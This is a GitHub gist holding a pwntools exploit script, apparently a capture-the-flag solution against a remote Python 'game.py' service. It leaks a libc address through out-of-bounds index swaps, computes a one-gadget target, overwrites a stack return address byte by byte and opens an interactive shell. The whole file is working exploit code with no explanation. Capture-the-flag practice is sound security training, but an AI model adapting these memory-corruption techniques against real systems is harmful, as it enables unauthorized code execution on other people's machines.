Created
March 10, 2023 15:10
-
-
Save X3eRo0/df332ca375b114faed40f16e6393ac36 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# -*- coding: utf-8 -*- | |
# this exploit was generated via | |
# 1) pwntools | |
# 2) ctfmate | |
import os | |
import time | |
import pwn | |
BINARY = "./python3.10" | |
LIBC = "./libc.so.6" | |
LD = "/lib64/ld-linux-x86-64.so.2" | |
# Set up pwntools for the correct architecture | |
exe = pwn.context.binary = pwn.ELF(BINARY) | |
libc = pwn.ELF(LIBC) | |
ld = pwn.ELF(LD) | |
pwn.context.terminal = ["tmux", "splitw", "-h"] | |
pwn.context.delete_corefiles = True | |
pwn.context.rename_corefiles = False | |
p64 = pwn.p64 | |
u64 = pwn.u64 | |
p32 = pwn.p32 | |
u32 = pwn.u32 | |
p16 = pwn.p16 | |
u16 = pwn.u16 | |
p8 = pwn.p8 | |
u8 = pwn.u8 | |
host = pwn.args.HOST or "52.59.124.14" | |
# host = pwn.args.HOST or "localhost" | |
port = int(pwn.args.PORT or 10013) | |
# port = int(pwn.args.PORT or 9090) | |
def local(argv=[], *a, **kw): | |
"""Execute the target binary locally""" | |
if pwn.args.GDB: | |
return pwn.gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw) | |
else: | |
return pwn.process([exe.path] + argv, *a, **kw) | |
def remote(argv=[], *a, **kw): | |
"""Connect to the process on the remote host""" | |
io = pwn.connect(host, port) | |
if pwn.args.GDB: | |
pwn.gdb.attach(io, gdbscript=gdbscript) | |
return io | |
def start(argv=[], *a, **kw): | |
"""Start the exploit against the target.""" | |
if pwn.args.LOCAL: | |
return local(argv, *a, **kw) | |
else: | |
return remote(argv, *a, **kw) | |
gdbscript = """ | |
set follow-fork-mode parent | |
continue | |
""".format( | |
**locals() | |
) | |
def leak(io, index): | |
io.sendlineafter(b"Easy or Hard? ", b"hard") | |
io.sendlineafter(b"Ready? ", b"") | |
io.recvline() | |
leak = [] | |
for i in range(8): | |
io.sendlineafter(b"Index 1: ", b"%d" % 0) | |
io.sendlineafter(b"Index 2: ", b"%d" % (index + i)) | |
after = [int(i) for i in io.recvline().strip().split(b"After: ")[1].split()] | |
leak.append(after[0]) | |
leak = u64(bytes(leak)) | |
return leak | |
def swap(io, idx1, idx2): | |
io.sendlineafter(b"Easy or Hard? ", b"hard") | |
io.sendlineafter(b"Ready? ", b"") | |
io.recvline() | |
for i in range(8): | |
io.sendlineafter(b"Index 1: ", (b"%d\x00" + p64(5)) % (idx1 + i)) | |
io.sendlineafter(b"Index 2: ", (b"%d\x00" + p64(5)) % (idx2 + i)) | |
return 0 | |
def write_byte(io, idx1, byte): | |
io.sendlineafter(b"Easy or Hard? ", b"hard") | |
io.sendlineafter(b"Ready? ", b"") | |
io.recvline() | |
for i in range(8): | |
io.sendlineafter(b"Index 1: ", (b"%d") % (idx1)) | |
io.sendlineafter(b"Index 2: ", (b"%d") % (byte)) | |
return 0 | |
def exp(off): | |
io = start(["game.py"]) | |
# =========================================================== | |
# EXPLOIT GOES HERE | |
# =========================================================== | |
total_ok = 0x108 | |
total_ns = 0x130 | |
# # swap(io, 0x198, 0xffffff) | |
# io.sendlineafter(b"Easy or Hard? ", b"hard") | |
# io.sendlineafter(b"Ready? ", b"") | |
# io.recvline() | |
# for i in range(1): | |
# io.sendlineafter(b"Index 1: ", (b"%d") % (5)) | |
# io.sendlineafter(b"Index 2: ", (b"%d") % (total_ok)) | |
# | |
# for i in range(1): | |
# io.sendlineafter(b"Index 1: ", (b"%d") % (0)) | |
# io.sendlineafter(b"Index 2: ", (b"%d") % (total_ns+4)) | |
# for i in range(0x100, 0x200, 8): | |
# print(hex(leak(io, i))) | |
libc_leak = leak(io, 0x8C8) | |
libc.address = libc_leak - 0x29E40 | |
pwn.info("libc: 0x%x\n" % libc.address) | |
off = 0x50A43 # 1 | |
# off = 0x80C55 # 1 | |
# off = 0x80C50 # 2 | |
# off = 0x80C50 # 4 | |
win = libc.address + off | |
# win = 0x414141414141 | |
io.sendlineafter(b"Easy or Hard? ", b"hard") | |
io.sendlineafter(b"Ready? ", b"") | |
io.recvline() | |
# indexes of return addresses on the stack. | |
ret_offs = [ | |
0xFFFFFF, # for debugging | |
0x2D8, | |
0x828, | |
0x658, | |
0x7F8, | |
0x2F8, | |
0x708, | |
0x6D8, | |
0x608, | |
0x5D8, | |
0x598, | |
0x4F8, | |
] | |
for i in range(8): | |
io.sendlineafter(b"Index 1: ", (b"%d") % (ret_offs[1] + i)) | |
io.sendlineafter(b"Index 2: ", (b"%d") % ((win >> (i * 8)) & 0xFF)) | |
# print("offset: 0x%x" % off) | |
# io.sendlineafter(b"Easy or Hard? ", b"asdf") | |
io.interactive() | |
io.close() | |
if __name__ == "__main__": | |
exp(0) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment